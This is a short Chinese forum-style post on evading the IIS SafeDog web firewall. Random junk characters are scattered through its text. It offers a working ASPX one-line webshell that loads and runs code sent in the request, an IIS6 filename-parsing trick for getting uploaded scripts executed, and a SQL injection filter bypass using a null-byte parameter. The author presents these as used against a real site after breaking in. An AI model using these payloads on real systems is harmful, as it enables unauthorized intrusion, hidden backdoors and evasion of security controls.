1、绕过IIS安全狗的一句话。
+ X6 p/ o# {8 e前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。; D5 v, S1 _( }+ |5 s
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
6 I, T! H2 \$ p6 `0 d8 G& }
( {; b8 h0 [9 g! a. V( Z2、IIS6.0解析漏洞遇到安全狗。7 X/ A' N& z0 ^) X/ F. |3 K2 C. e
文件名为
5 W/ R2 F; H: {- a- ^http://www.xxxxx.com/sh3llc0de.asp;1.jpg
3 J t& G, d) u b2 _) V6 R. [$ f% G
这样的会被IIS安全狗果断屏蔽。8 s9 A1 O" i9 ^/ X' ?
改成如下名称,IIS6一样会解析:
" d3 x! H' m ^4 n9 Y) ~% M9 @; @+ X6 M& Kwww.xxxxx.com/;1.asp;1.jpg8 D: _# W V8 P0 ]- X: K$ y5 f
7 Y1 R7 i. a$ K+ Y( ~
3、安全狗的注入绕过。2 ] i+ J y$ L
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
1 j3 y3 j/ b4 A5 X6 j但如果:6 `) y0 P# i5 w7 J
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=11 N$ G% ]8 K8 [
就可以成功绕过了。
, i6 `4 d( y+ w% m1 x% o3 r% w- |( z
% o. _0 L5 z) h
3 f, V8 f, u6 l+ L |